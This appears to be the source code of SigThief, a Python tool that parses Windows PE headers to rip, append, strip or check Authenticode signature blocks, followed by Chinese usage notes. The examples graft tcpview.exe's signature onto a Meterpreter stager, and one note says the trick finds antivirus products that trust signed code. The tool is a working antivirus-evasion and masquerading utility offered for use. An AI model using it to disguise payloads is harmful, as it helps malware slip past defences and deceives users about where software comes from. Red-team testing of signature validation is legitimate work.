1. #!/usr/bin/env python3
  2. # LICENSE: BSD-3
  3. # Copyright: Josh Pitts @midnite_runr
  5. import sys
  6. import struct
  7. import shutil
  8. import io
  9. from optparse import OptionParser
  11. def gather_file_info_win(binary):
  12. """
  13. Borrowed from BDF...
  14. I could just skip to certLOC... *shrug*
  15. """
  16. flItms = {}
  17. binary = open(binary, 'rb')
  18. binary.seek(int('3C', 16))
  19. flItms['buffer'] = 0
  20. flItms['JMPtoCodeAddress'] = 0
  21. flItms['dis_frm_pehdrs_sectble'] = 248
  22. flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
  23. # Start of COFF
  24. flItms['COFF_Start'] = flItms['pe_header_location'] + 4
  25. binary.seek(flItms['COFF_Start'])
  26. flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
  27. binary.seek(flItms['COFF_Start'] + 2, 0)
  28. flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
  29. flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
  30. binary.seek(flItms['COFF_Start'] + 16, 0)
  31. flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
  32. flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
  33. #End of COFF
  34. flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
  36. #if flItms['SizeOfOptionalHeader']:
  37. #Begin Standard Fields section of Optional Header
  38. binary.seek(flItms['OptionalHeader_start'])
  39. flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
  40. flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
  41. flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
  42. flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
  43. flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
  44. flItms['SizeOfUninitializedData'] = struct.unpack("<I",
  45. binary.read(4))[0]
  46. flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
  47. flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
  48. flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
  49. if flItms['Magic'] != 0x20B:
  50. flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
  51. # End Standard Fields section of Optional Header
  52. # Begin Windows-Specific Fields of Optional Header
  53. if flItms['Magic'] == 0x20B:
  54. flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
  55. else:
  56. flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
  57. flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
  58. flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
  59. flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
  60. binary.read(2))[0]
  61. flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
  62. binary.read(2))[0]
  63. flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
  64. flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
  65. flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
  66. flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
  67. flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
  68. flItms['SizeOfImageLoc'] = binary.tell()
  69. flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
  70. flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
  71. flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
  72. flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
  73. flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
  74. if flItms['Magic'] == 0x20B:
  75. flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
  76. flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
  77. flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
  78. flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
  80. else:
  81. flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
  82. flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
  83. flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
  84. flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
  85. flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0] # zero
  86. flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
  87. # End Windows-Specific Fields of Optional Header
  88. # Begin Data Directories of Optional Header
  89. flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
  90. flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
  91. flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
  92. #ImportTable SIZE|LOC
  93. flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
  94. flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
  95. flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
  96. flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
  97. flItms['CertTableLOC'] = binary.tell()
  98. flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
  99. flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
  100. binary.close()
  101. return flItms
  103. def copyCert(exe):
  104. flItms = gather_file_info_win(exe)
  106. if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
  107. # not signed
  108. print("Input file Not signed!")
  109. sys.exit(-1)
  111. with open(exe, 'rb') as f:
  112. f.seek(flItms['CertLOC'], 0)
  113. cert = f.read(flItms['CertSize'])
  114. return cert
  116. def writeCert(cert, exe, output):
  117. flItms = gather_file_info_win(exe)
  119. if not output:
  120. output = output = str(exe) + "_signed"
  122. shutil.copy2(exe, output)
  124. print("Output file: {0}".format(output))
  126. with open(exe, 'rb') as g:
  127. with open(output, 'wb') as f:
  128. f.write(g.read())
  129. f.seek(0)
  130. f.seek(flItms['CertTableLOC'], 0)
  131. f.write(struct.pack("<I", len(open(exe, 'rb').read())))
  132. f.write(struct.pack("<I", len(cert)))
  133. f.seek(0, io.SEEK_END)
  134. f.write(cert)
  136. print("Signature appended. \nFIN.")
  138. def outputCert(exe, output):
  139. cert = copyCert(exe)
  140. if not output:
  141. output = str(exe) + "_sig"
  143. print("Output file: {0}".format(output))
  145. open(output, 'wb').write(cert)
  147. print("Signature ripped. \nFIN.")
  149. def check_sig(exe):
  150. flItms = gather_file_info_win(exe)
  152. if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
  153. # not signed
  154. print("Inputfile Not signed!")
  155. else:
  156. print("Inputfile is signed!")
  158. def truncate(exe, output):
  159. flItms = gather_file_info_win(exe)
  161. if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
  162. # not signed
  163. print("Inputfile Not signed!")
  164. sys.exit(-1)
  165. else:
  166. print( "Inputfile is signed!")
  168. if not output:
  169. output = str(exe) + "_nosig"
  171. print("Output file: {0}".format(output))
  173. shutil.copy2(exe, output)
  175. with open(output, "r+b") as binary:
  176. print('Overwriting certificate table pointer and truncating binary')
  177. binary.seek(-flItms['CertSize'], io.SEEK_END)
  178. binary.truncate()
  179. binary.seek(flItms['CertTableLOC'], 0)
  180. binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
  182. print("Signature removed. \nFIN.")
  184. def signfile(exe, sigfile, output):
  185. flItms = gather_file_info_win(exe)
  187. cert = open(sigfile, 'rb').read()
  189. if not output:
  190. output = output = str(exe) + "_signed"
  192. shutil.copy2(exe, output)
  194. print("Output file: {0}".format(output))
  196. with open(exe, 'rb') as g:
  197. with open(output, 'wb') as f:
  198. f.write(g.read())
  199. f.seek(0)
  200. f.seek(flItms['CertTableLOC'], 0)
  201. f.write(struct.pack("<I", len(open(exe, 'rb').read())))
  202. f.write(struct.pack("<I", len(cert)))
  203. f.seek(0, io.SEEK_END)
  204. f.write(cert)
  205. print("Signature appended. \nFIN.")
  207. if __name__ == "__main__":
  208. usage = 'usage: %prog [options]'
  209. parser = OptionParser()
  210. parser.add_option("-i", "--file", dest="inputfile",
  211. help="input file", metavar="FILE")
  212. parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
  213. help='rip signature off inputfile')
  214. parser.add_option('-a', '--add', dest='addsig', action='store_true',
  215. help='add signautre to targetfile')
  216. parser.add_option('-o', '--output', dest='outputfile',
  217. help='output file')
  218. parser.add_option('-s', '--sig', dest='sigfile',
  219. help='binary signature from disk')
  220. parser.add_option('-t', '--target', dest='targetfile',
  221. help='file to append signature to')
  222. parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
  223. help='file to check if signed; does not verify signature')
  224. parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
  225. help='truncate signature (i.e. remove sig)')
  226. (options, args) = parser.parse_args()
  228. # rip signature
  229. # inputfile and rip to outputfile
  230. if options.inputfile and options.ripsig:
  231. print("Ripping signature to file!")
  232. outputCert(options.inputfile, options.outputfile)
  233. sys.exit()
  235. # copy from one to another
  236. # inputfile and rip to targetfile to outputfile
  237. if options.inputfile and options.targetfile:
  238. cert = copyCert(options.inputfile)
  239. writeCert(cert, options.targetfile, options.outputfile)
  240. sys.exit()
  242. # check signature
  243. # inputfile
  244. if options.inputfile and options.checksig:
  245. check_sig(options.inputfile)
  246. sys.exit()
  248. # add sig to target file
  249. if options.targetfile and options.sigfile:
  250. signfile(options.targetfile, options.sigfile, options.outputfile)
  251. sys.exit()
  253. # truncate
  254. if options.inputfile and options.truncate:
  255. truncate(options.inputfile, options.outputfile)
  256. sys.exit()
  258. parser.print_help()
  259. parser.error("You must do something!")








如何使用 ?


  1. Usage: sigthief.py [options]
  2. Options:
  3. -h, --help show this help message and exit
  4. -i FILE, --file=FILE input file
  5. -r, --rip rip signature off inputfile
  6. -a, --add add signautre to targetfile
  8. output file
  9. -s SIGFILE, --sig=SIGFILE
  10. binary signature from disk
  11. -t TARGETFILE, --target=TARGETFILE
  12. file to append signature too
  13. -c, --checksig file to check if signed; does not verify signature
  14. -T, --truncate truncate signature (i.e. remove sig)


  1. $ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe
  2. Output file: /tmp/msftesting_tcpview.exe
  3. Signature appended.
  4. FIN.


  1. $ ./sigthief.py -i tcpview.exe -r
  2. Ripping signature to file!
  3. Output file: tcpview.exe_sig
  4. Signature ripped.
  5. FIN.


  1. $ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe
  2. Output file: x86_meterpreter_stager.exe_signed
  3. Signature appended.
  4. FIN.


这实际上有非常有趣的结果,可以帮助您找到重视代码功能签名的AV。Unsign putty.exe;)

  1. $ ./sigthief.py -i tcpview.exe -T
  2. Inputfile is signed!
  3. Output file: tcpview.exe_nosig
  4. Overwriting certificate table pointer and truncating binary
  5. Signature removed.
  6. FIN.


  1. $ ./sigthief.py -i tcpview.exe -c
  2. Inputfile is signed!
    git clone https://github.com/secretsquirrel/SigThief

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